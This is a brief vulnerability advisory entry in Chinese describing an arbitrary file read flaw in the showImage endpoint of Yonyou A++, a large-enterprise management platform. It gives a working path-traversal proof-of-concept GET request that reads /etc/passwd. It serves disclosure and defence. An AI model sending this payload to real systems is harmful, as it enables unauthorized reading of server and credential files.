用友A++ /ma/emp/maEmp/showImage 文件读取漏洞

2026-08-14 用友A++ PoC Public

Description

用友A++(Yonyou A++)是用友网络科技股份有限公司面向大型集团企业推出的智能管理平台,提供财务、人力、供应链等核心业务模块,广泛应用于大型集团企业的数字化管理场景。用友A++ /ma/emp/maEmp/showImage 接口存在文件读取漏洞,攻击者可读取服务器任意文件。

PoC

GET /ma/emp/maEmp/showImage?fileName=/../../../../../../../../../../../etc/passwd HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities